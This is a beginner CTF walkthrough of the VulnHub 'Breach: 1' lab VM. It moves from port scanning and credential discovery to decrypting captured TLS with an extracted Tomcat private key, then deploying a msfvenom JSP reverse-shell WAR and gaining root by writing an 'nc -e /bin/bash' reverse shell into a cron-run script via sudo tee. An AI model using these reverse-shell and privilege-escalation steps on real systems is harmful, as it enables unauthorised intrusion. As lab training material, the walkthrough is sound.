[VulnHub] Breach: 1

“First in a multi-part series, Breach 1.0 is meant to be beginner to intermediate boot2root/CTF challenge. Solving will take a combination of solid information gathering and persistence. Leave no stone unturned.

The VM is configured with a static IP address (192.168.110.140) so you will need to configure your host-only adaptor to this subnet.“ – mrb3n

More information and OVA file download please check here.

Attacker & Target

Attacker: Kali2 Linux (192.168.110.129/24)

Target: Breach 1.0 (192.168.110.140/24)

Tools

All the tools used here can be found in Kali Linux

Walkthrough

Using arp-scan as routine to detect the target’s IP address.

1
2
3
4
5
6
7
8
9
10
11
root@kali:~# arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
192.168.110.1 00:50:56:c0:00:08   VMware, Inc.
192.168.110.2 00:50:56:f1:61:7e   VMware, Inc.
192.168.110.128   00:0c:29:5f:3b:1a   VMware, Inc.
192.168.110.140   00:0c:29:f1:0a:9f   VMware, Inc.
192.168.110.254   00:50:56:e9:0a:b5   VMware, Inc.

5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.421 seconds (105.74 hosts/sec). 5 responded

192.168.110.140 is our Target!

Then run masscan to detect opening ports on the target (masscan is much faster than nmap when doing a full ports scan, so here I use it to make a full scan and then use nmap to do a deep scan on target ports).

Since we got all ports open when doing masscan ports scan, that sounds like the server is located behind an IDS or IPS.

Without the auto-port scanner, I have to check ports manually. So I started from common ports and port 80 would be the first come out~

Good, the target is providing WEB service, so I run nikto to do an auto scan on port 80.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
root@kali:~/myExercises/breach1# nikto -host 192.168.110.140 -output 192.168.110.140_nikto.txt
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.110.140
+ Target Hostname:    192.168.110.140
+ Target Port:        80
+ Start Time:         2016-11-27 14:36:24 (GMT11)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x44a 0x534a04f49139d
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: IIS may reveal its internal or real IP in the Location header via a request to the /images directory. The value is "http://127.0.1.1/images/".
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7535 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2016-11-27 14:36:45 (GMT11) (21 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Here is a directory found /images/.

Download all the pictures and checked them by using exiftool, found one comment coffeestains in file bill.png.

1
2
3
4
5
6
7
8
root@kali:~/myExercises/breach1/images# exiftool * | grep -i -e 'File Name' -e 'Comment'
File Name                       : bill.png
Comment                         : coffeestains
File Name                       : cake.jpg
File Name                       : initech.jpg
File Name                       : milton_beach.jpg
File Name                       : swingline.jpg
File Name                       : troll.gif

Took a note here, for now.

By checking the source code as follow, I noticed that there is a page called initech.html and some encoded text (looks like base64 encoded) in the comment.

After decoded twice of the string Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo, I got the plaintext: pgibbons:damnitfeel$goodtobeagang$ta which highly possible to be a pair of username and password divided by :.

Take a note here, the username is pgibbons and the password is damnitfeel$goodtobeagang$ta.

Then moving on to the new page initech.html.

Employee portal just outstanding on the menu, so heading into it and using the username and password found before, bingo!!

After get in, there are 3 new emails in the mailbox.

Got something suspectable In the 3rd message, and download the secret file .keystore.

Keep note here, and then search ssl in order to find more information about the new SSL certificate, and I got another message which disclosed a pcap file link, also the storepassword and keypassword are all set to tomcat.

Now downloaded the pcap file and opened it using wireshark, all the TCP stream is encrypted, so I need to import a certificate to decrypt.

Then I decided to back to the .keystore file and searched online, got that is tomcat certificate keystore file. Using keytool and the password tomcat to check it.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
root@kali:~/myExercises/breach1# keytool -list -v -keystore keystore
Enter keystore password:

Keystore type: JKS
Keystore provider: SUN

Your keystore contains 1 entry

Alias name: tomcat
Creation date: May 21, 2016
Entry type: PrivateKeyEntry
Certificate chain length: 1
Certificate[1]:
Owner: CN=Unknown, OU=Unknown, O=Unknown, L=Unknown, ST=Unknown, C=Unknown
Issuer: CN=Unknown, OU=Unknown, O=Unknown, L=Unknown, ST=Unknown, C=Unknown
Serial number: 60856e88
Valid from: Sat May 21 03:51:07 AEST 2016 until: Fri Aug 19 03:51:07 AEST 2016
Certificate fingerprints:
   MD5:  C4:72:E6:B0:5F:58:CE:8B:B4:7E:2D:67:86:A9:52:A0
   SHA1: D5:D2:49:C3:69:93:CC:E5:39:A9:DE:5C:91:DC:F1:26:A6:40:46:53
   SHA256: F0:4A:E8:7F:52:C1:78:B4:14:2B:4D:D9:1A:34:31:F7:19:0A:29:F6:0C:85:00:0B:58:3A:37:20:6C:7E:E6:31
   Signature algorithm name: SHA256withRSA
   Version: 3

Extensions:

#1: ObjectId: 2.5.29.14 Criticality=false
SubjectKeyIdentifier [
KeyIdentifier [
0000: 47 6B A3 37 ED A5 1F 0A   0D 61 CA AA 17 9C F4 8C  Gk.7.....a......
0010: 10 64 87 DF                                        .d..
]
]



*******************************************
*******************************************


root@kali:~/myExercises/breach1#

Then trying to extract private key from the keystore file:

1
2
3
4
5
6
7
root@kali:~/myExercises/breach1# keytool -v -importkeystore -srckeystore keystore -srcalias tomcat -destkeystore myp12file.p12 -deststoretype PKCS12
Enter destination keystore password:
Re-enter new password:
Enter source keystore password:
[Storing myp12file.p12]
root@kali:~/myExercises/breach1# ls
keystore  myp12file.p12  _SSL_test_phase1.pcap

check the private key:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
root@kali:~/myExercises/breach1# openssl pkcs12 -in myp12file.p12 -nocerts -nodes
Enter Import Password:
MAC verified OK
Bag Attributes
    friendlyName: tomcat
    localKeyID: 54 69 6D 65 20 31 34 38 30 31 34 34 33 35 37 32 36 35
Key Attributes: <No Attributes>
-----BEGIN PRIVATE KEY-----
MIIEvwIBADANBgkqhkiG9w0BAQEFAASCBKkwggSlAgEAAoIBAQCjJXnELHvCEyTT
ZW/cJb7sFuwIUy5l5DkBXD9hBgRtpUSIv9he5RbJQwGuwyw5URbm3pa7z1eoRjFW
HLMVzKYte6AyyjUoWcc/Fs9fiu83+F0G36JmmFcxLFivVQwCHKhrajUc15i/XtCr
ExEDNL0igM8YnCPq4J9lXrXUanLltR464F7cJdLbkqHiqRvoFiOQi9e3CIZ86uoY
UNBupj2/njMFRuB7dEoeaQ/otHZIgCgjbP76I+/xyL/RkGxYuU0e1tpQiLxTi7kF
nJ1Rd55Gd+DvzuBiI9F+fxa4+TSQvRvQEzJIKowbPw6h82Cd66yFju8c2AKiaDie
F+AqVim3AgMBAAECggEBAIr2Ssdr1GY0hDODvUnY5MyXoahdobGsOVoNRvbPd0ol
cUDBl/0MSOJZLr+7Apo3lbhEdEO4kkOEtlVQ0MGKtSkcmhFo5updvjbgqPYKk0Qr
SqGmLuAQdoQt78Q4Pqg13MbRijfs8/BdRIPTE7SVYVxYNw4RQQ65EUv45gvuN7ur
shV5WSHVaN5QyUHyOTKcvFuBqxb9Mfo2NtRGZCG2QuG8V/C+k2k8+Q+n2wDaOXw8
sIWKVMHngOMcW1OBnM3ac/bTeI2+LI5cMsBZqYlLmkH1AOlnCgpH7389NbRQQJSo
sExX51v5r2mmI1JdzszwQYqRfH7+nugDRjBEN2ztqFECgYEA4eBiLFP9MeLhjti8
PDElSG4MVf/I9WXfLDU79hev7npRw8LE0rzPgawXOL8NhTbp8/X1D071bGaA3rCU
oBEEPclXlSwXHroZVjJALDhaPrIfFT6gBXlb9wAYSzWYED4LKXDuddVChrTo4Lmx
XaHb/KM7kpPuUWr+xccEEuNJBnMCgYEAuOduxGz2Ecd+nwATsZpjgG5/SwLL/rd0
TEMNQbB/XUIOI8mZpw5Dn1y71qCijk/A+oVzohc6Dspso4oXLMy0b+HCFPTKuGgg
Hf8QV5YbDg0urH8KNNEEH7Dx/C6cp6vVAcj6eQ2wOwW62yVY8gy2elWH0gte1BXl
hHiKIaLueq0CgYEAoAwi4+/7Ny7gzhvKfQgBt+mqOgGM/jzZvnRV8VDlayAm8YP/
fKcmjWZH6gCN7vdzHFcJ9nfnNJEI/UG3fhewnqscsOlV1ILe0xG2IN8pKsWBescu
EdLlFAZwMFJgVhnwRMPtY3bhtZtYa2uIPqUiwEdVPc4uDmi276LNwyhjJPsCgYA7
ANcO5TpMiB12vX6LURnpVNlX5WeVO5Nn9omXaavq5XY/o0hdz6ZyhxQFtDLLONX6
23T/x2umZp/uO9WTXStC/IaDS24ZFFkTWV4spOCzRi+bqdpm6j/noP5HG9SviJyr
Oif7Uwvmebibz7onWzkrpnl15Fz5Tpd0A0cI3sY87QKBgQDLZ9pl505OMHOyY6Xr
geszoeaj4cQrRF5MO2+ad81LT3yoLjZyARaJJMEAE7FZxPascemlg9KR3JPnevIU
3RdMGHX75yr92Sd8lNQvSO6RWUuRnc889xN1YrpPx5G1VppIFqTrcB0gAiREkeUA
pHiPhbocjixKJz9xx+pG0jDkrg==
-----END PRIVATE KEY-----
root@kali:~/myExercises/breach1#

Now I will import the Private key file into wireshark in order to decrypt the SSL stream.

After imported the private key, I have to re-open the pcap file in wireshark, now the traffic is quite clear, then right click in wireshark and choose Follow –> SSL Stream to read the traffic clearly.

From here, got a HTTP Basic login credential in base64 encoded: dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC.

After decoded it, i got the plaintext: tomcat:Tt\5D8F(#!*u=G)4m7zB, which username is tomcat and password is Tt\5D8F(#!*u=G)4m7zB.

And based on the first two lines above, the login URL should be https://192.168.110.140:8443/_M@nag3Me/html.

[Note] Here I could not load the page correctly via firefox directly, but when I use burp proxy as a proxy, I was able to add exception in the firefox to access the tomcat page.

Now I got in, from here, I could generate and upload an evil .WAR file or use metasploit to exploit automatically.

Using msfvenom to generate a WAR webshell by following commond [3]:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.110.129 LPORT=443 -f war > shell.war

Then setup msfconsole to listen on and got a reverse shell back as soon as I triggerred.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
smsf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (java/jsp_shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.110.129  yes       The listen address
   LPORT  443              yes       The listen port
   SHELL                   no        The system shell to use.


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.110.129:443
[*] Starting the payload handler...
[*] Command shell session 4 opened (192.168.110.129:443 -> 192.168.110.140:37620) at 2016-11-27 14:17:25 +1100

id
uid=104(tomcat6) gid=112(tomcat6) groups=112(tomcat6)

Great! got in. However, after spended couple of hours looking around in the system, I could not get any further.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
tomcat6@Breach:/home/milton$ s -al
ls -al
total 156
drwxr-xr-x 3 milton milton   4096 Jun  6 15:34 .
drwxr-xr-x 4 root   root     4096 Jun  4 19:24 ..
-rw------- 1 milton milton    234 Jun 11 18:15 .bash_history
-rw-r--r-- 1 milton milton    220 May 20  2016 .bash_logout
-rw-r--r-- 1 milton milton   3637 May 20  2016 .bashrc
drwx------ 2 milton milton   4096 May 20  2016 .cache
-rw-rw-r-- 1 milton milton   2245 May 20  2016 .keystore
-rw-rw-r-- 1 milton milton 111255 Jun  4 18:46 my_badge.jpg
-rw------- 1 milton milton    407 Jun  4 18:18 .mysql_history
-rw-r--r-- 1 milton milton    675 May 20  2016 .profile
-rw-r--r-- 1 root   root       66 Jun  4 10:57 .selected_editor
-rwxrwxrwx 1 milton milton    755 Jun  4 10:51 some_script.sh

tomcat6@Breach:/home/milton$ cat some_script.sh
cat some_script.sh


 _____ _                   _                   _   _     _               _
|_   _| |                 ( )                 | | | |   (_)             | |
  | | | |__   ___ _ __ ___|/ ___   _ __   ___ | |_| |__  _ _ __   __ _  | |__   ___ _ __ ___
  | | | '_ \ / _ \ '__/ _ \ / __| | '_ \ / _ \| __| '_ \| | '_ \ / _` | | '_ \ / _ \ '__/ _ \
  | | | | | |  __/ | |  __/ \__ \ | | | | (_) | |_| | | | | | | | (_| | | | | |  __/ | |  __/
  \_/ |_| |_|\___|_|  \___| |___/ |_| |_|\___/ \__|_| |_|_|_| |_|\__, | |_| |_|\___|_|  \___|
                                                                  __/ |
                                                                 |___/

I found that account blumbergh is owned by Bill Lumbergh when I was checking the file /etc/passwd.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
tomcat6@Breach:/home$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
landscape:x:103:109::/var/lib/landscape:/bin/false
milton:x:1000:1000:Milton_Waddams,,,:/home/milton:/bin/bash
tomcat6:x:104:112::/usr/share/tomcat6:/bin/false
colord:x:105:114:colord colour management daemon,,,:/var/lib/colord:/bin/false
mysql:x:106:116:MySQL Server,,,:/nonexistent:/bin/false
blumbergh:x:1001:1001:Bill Lumbergh,,,:/home/blumbergh:/bin/bash

Things are getting clear, from the previous notes, I got a string coffeestains, in bill.png, which looks like a password, and now I got Bill’s account name is blumbergh.

Now I tried to su to blumbergh with the password coffeestains.

1
2
3
4
5
6
7
8
tomcat6@Breach:/home$ su blumbergh
su blumbergh
Password: coffeestains

blumbergh@Breach:/home$ id
id
uid=1001(blumbergh) gid=1001(blumbergh) groups=1001(blumbergh)
blumbergh@Breach:/home$ 

Great! got in!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
blumbergh@Breach:/home$ cd blumbergh
cd blumbergh
blumbergh@Breach:~$ ls -al
ls -al
total 28
drwxr-xr-x 3 blumbergh blumbergh 4096 Jun 12 09:42 .
drwxr-xr-x 4 root      root      4096 Jun  4 19:24 ..
-rw------- 1 blumbergh blumbergh   61 Jun 12 09:42 .bash_history
-rw-r--r-- 1 blumbergh blumbergh  220 Jun  4 19:24 .bash_logout
-rw-r--r-- 1 blumbergh blumbergh 3637 Jun  4 19:24 .bashrc
drwx------ 2 blumbergh blumbergh 4096 Jun  6 17:55 .cache
-rw-r--r-- 1 blumbergh blumbergh  675 Jun  4 19:24 .profile
blumbergh@Breach:~$ cat .bash_history
cat .bash_history
clear
logoff
logout
exit
cd /usr/share/cleanup
cat tidyup.sh


blumbergh@Breach:~$ locate tidyup.sh
locate tidyup.sh
/usr/share/cleanup/tidyup.sh

blumbergh@Breach:~$ ls -al /usr/share/cleanup/tidyup.sh
ls -al /usr/share/cleanup/tidyup.sh
-rwxr-xr-x 1 root root 289 Jun 12 09:36 /usr/share/cleanup/tidyup.sh

blumbergh@Breach:~$ cat /usr/share/cleanup/tidyup.sh
cat /usr/share/cleanup/tidyup.sh
#!/bin/bash

#Hacker Evasion Script 
#Initech Cyber Consulting, LLC
#Peter Gibbons and Michael Bolton - 2016
#This script is set to run every 3 minutes as an additional defense measure against hackers.

cd /var/lib/tomcat6/webapps && find swingline -mindepth 1 -maxdepth 10 | xargs rm -rf

blumbergh@Breach:~$ sudo -l
sudo -l
Matching Defaults entries for blumbergh on Breach:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User blumbergh may run the following commands on Breach:
    (root) NOPASSWD: /usr/bin/tee /usr/share/cleanup/tidyup.sh
blumbergh@Breach:~$ 

Here I know that tidyup.sh script will be run automatically every 3 minutes, and blumbergh got ROOT priviledge to run the command /usr/bin/tee /usr/share/cleanup/tidyup.sh which will be able to modify the tidyup.sh script to evil shell.

After setup nc to listen on local port 7777, I run the following command to modify tidyup.sh script to include evil code:

1
2
3
4
5
6
blumbergh@Breach:~$ echo "nc -e /bin/bash 192.168.110.129 7777" | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh
tee /usr/share/cleanup/tidyup.sh0.129 7777" | sudo /usr/bin/
nc -e /bin/bash 192.168.110.129 7777
blumbergh@Breach:~$ cat /usr/share/cleanup/tidyup.sh
cat /usr/share/cleanup/tidyup.sh
nc -e /bin/bash 192.168.110.129 7777

Then waiting a few minutes, I got ROOT in !! :D

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
root@kali:~# nc -lvnp 7777
listening on [any] 7777 ...
connect to [192.168.110.129] from (UNKNOWN) [192.168.110.140] 45022
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
pwd
/root
ls -la
total 60
drwx------  4 root root  4096 Jun 12 09:37 .
drwxr-xr-x 22 root root  4096 Jun  4 09:56 ..
-rw-------  1 root root   115 Jun 12 09:42 .bash_history
-rw-r--r--  1 root root  3106 Feb 19  2014 .bashrc
drwx------  2 root root  4096 Jun  6 15:17 .cache
-rw-r--r--  1 root root   840 Jun 11 17:34 .flag.txt
-rw-r--r--  1 root root 23792 Jun  4 19:17 flair.jpg
-rw-r--r--  1 root root   140 Feb 19  2014 .profile
drwxr-xr-x  2 root root  4096 Jun  5 17:51 .rpmdb
-rw-r--r--  1 root root    66 Jun  4 19:48 .selected_editor
cat .flag.txt
-----------------------------------------------------------------------------------

______                     _     __   _____      _____ _          _____          _
| ___ \                   | |   /  | |  _  |    |_   _| |        |  ___|        | |
| |_/ /_ __ ___  __ _  ___| |__ `| | | |/' |______| | | |__   ___| |__ _ __   __| |
| ___ \ '__/ _ \/ _` |/ __| '_ \ | | |  /| |______| | | '_ \ / _ \  __| '_ \ / _` |
| |_/ / | |  __/ (_| | (__| | | || |_\ |_/ /      | | | | | |  __/ |__| | | | (_| |
\____/|_|  \___|\__,_|\___|_| |_\___(_)___/       \_/ |_| |_|\___\____/_| |_|\__,_|


-----------------------------------------------------------------------------------
Congrats on reaching the end and thanks for trying out my first #vulnhub boot2root!

Shout-out to knightmare, and rastamouse for testing and g0tmi1k for hosting.
2016-11-29 06:09:35 -0500